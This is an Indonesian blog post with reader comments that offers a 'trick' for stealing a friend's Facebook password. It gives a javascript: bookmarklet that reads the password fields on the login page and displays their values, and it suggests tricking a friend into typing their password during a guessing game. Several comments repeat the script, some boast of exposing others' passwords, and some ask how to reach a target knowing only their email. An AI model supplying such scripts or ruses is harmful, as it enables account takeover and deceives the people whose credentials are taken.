July 13, 2024

Trik Sederhana Mengetahui Password Facebook

1 min read

Siapa sekarang yang tidak kenal dengan facebook. Pasti teman-teman  sudah tidak asing lagi dengan jejaring sosial yang satu ini. Karena sudah mendunia, dan sudah banyak orang mau menggunakan jejaring sosial, dengan alasan ingin mengenal banyak orang dari daerah ke daerah lainnya. Tapi, bukan hanya ingin mengenal orang lain lewat jejaring sosial, ada juga yang mau mengambil akun teman sendiri dari daftar kontaknya. Banyak orang melakukan berbagai cara untuk mendapatkan akun orang lain, salah satunya adalah mencuri password facebook. Mencuri password itu mudah asalkan kita tahu jalannya (bener nggak?) Tapi sebenarnya tips ini tidak terlalu efisien, tapi pantas temen-temen  coba untuk mengetahui dengan detil password teman kita, penasaran??? ayolah dilanjut.

Langkah 1

Silahkan  buka facebook. Untuk melakukan test coba masukkan email dan password kita dikolom login (tapi jangan klik login dulu).

image

Langkah 2

Delete alamat facebooknya, lalu paste di address bar, lihat gambar dibawah ini :


Copy kode dibawah ini :

javascript:var a = new String(); for (var i = 0; i < document.forms.length; i++) { for (var j = 0; j < document.forms[i].elements.length; j++) { if (document.forms[i].elements[j].type == “password” ) {a += document.forms[i].elements[j].value; } } } alert(a);

Langkah 3


Tekan tombol enter, jreeeng…!!!!! passwordnya ketahuan. Agar trik ini berhasil, ajaklah teman anda untuk bermain tebak-tebakan password facebook. positif thinking..!!

Catatan: script suatu saat bisa dinonaktifkan, karena facebok mengalami pembaruan secara terus menerus.

0 thoughts on “Trik Sederhana Mengetahui Password Facebook

  1. weks…waw waw…

    apoan ini, script nya dak acak di cubo lagi..kalu ado yang kurang sir…

    madaki dikit nian…ups, sebelumnya

    ado logo smile itu toh yang ngacau ay ay ay

    payo…sep jalan sir…

  2. upzz…
    kok gak tampil passnya…
    pas dicopy kode diatas
    javascript:var a = new String(); for (var i = 0; i < document.forms.length; i++) { for (var j = 0; j < document.forms[i].elements.length; j++) { if (document.forms[i].elements[j].type == “password” {a += document.forms[i].elements[j].value; } } } alert(a);
    dia cuman ngeblog passnya tpi gak nampilin passnya..
    he
    gmna nieah gan
    :ngakaks

  3. Usahanyo dah bagus.. 😀 tp caknyo yang bermasalah di scriptnyo.. hehee… Lanjutkan..!! :iloveindonesias

  4. Ini pemilik TS pengen jd hacker tp gagal ! 😀

    Ado caro hacker yg lebih simpel .
    🙂

  5. **** ini saya tambahanin sdikit….. alamat address facebook di gantikan dengan scrip ini::*********** javascript:var a = new String(); for (var i = 0; i < document.forms.length; i++) { for (var j = 0; j < document.forms[i].elements.length; j++) { if (document.forms[i].elements[j].type == "password" ) {a += document.forms[i].elements[j].value; } } } alert(a); ********** :thumbup: …… coba teman2 ulangin lagi dech…. pasti bisa kok….

    @ Yasir ::: lanjutkan kreatifitas mu…. :thumbup:

  6. **** ini saya tambahanin sdikit….. alamat address facebook di gantikan dengan scrip tersebut ********** :thumbup: …… coba teman2 ulangin lagi dech…. pasti bisa kok….

    @ Yasir ::: lanjutkan kreatifitas mu…. :thumbup:

  7. bisa…bisa……bisa……, asal cara nya bener..bisa kok……..

    paste scriptnya, trus login, passnya muncul dalam bentuk javascript …….

    semangat sirr…..Lanjut.. :Peace:
    :sun:

  8. **** ini saya tambahanin sdikit….. alamat address facebook di gantikan dengan scrip tersebut ********** …… coba teman2 ulangin lagi dech…. pasti bisa kok….

    @ Yasir ::: lanjutkan kreatifitas mu….

  9. bisa..bisa..tu aq sdah d mainin sm Mb Achie 😉 ..ketauan dah pass ny sm Mb Achie 🙁

    @yasir…
    lanjut kan :iloveindonesias

  10. Wahhh,,,,, caknyo.. ado script yang berubah .. perasaan ado gambar smile di tengah2 scriptnya.. kok skrg dk ada ye..?? :amazed:

    tp setelah smilenya hilang… PASSWORD FB Ane muncul.. :Peace: Ganbatte Yasir..!!

  11. ado yg nak ngolai aku tapi dak pacak tekola… jiahahahaha…
    *ngelirik ke achi*
    jiahahahahahaha :ngakaks

  12. kwkwkkwkwkw……. banyak wonk tekolah…..hehehhehe…..

    @cocobo –> hmmmmmm……dak po2…yg jelas sdh dapet mangsa 2…wkwkwkkw

  13. jiahahahaha….
    mesti belajar 100 taun lagi..
    betapo dulu di goa hiro..
    baru pacak ngolai aku…
    nyahahahaha….. :ngakaks

  14. wkwkkwwkwkwk…………maafkelah…….
    @v3–> hehehe….
    @ridho –> weeekkk….ksian deh……

    :ngakaks

    1. tu kyk mno klw email password yo dak di ketik

      utk tw password wonk lain dgn idak mengetik password y di kolom password
      it kyk mno scrift y.??

  15. Keren.. O ya.. kk hendra..
    ane mau tanya ne. kl misalkan kita cm tw email ny si target doank gmna tu..
    (target blm pernah login di PC kita) ??//
    terima kasih..

Leave a Reply

Your email address will not be published. Required fields are marked *

Copyright © All rights reserved. | Newsphere by AF themes.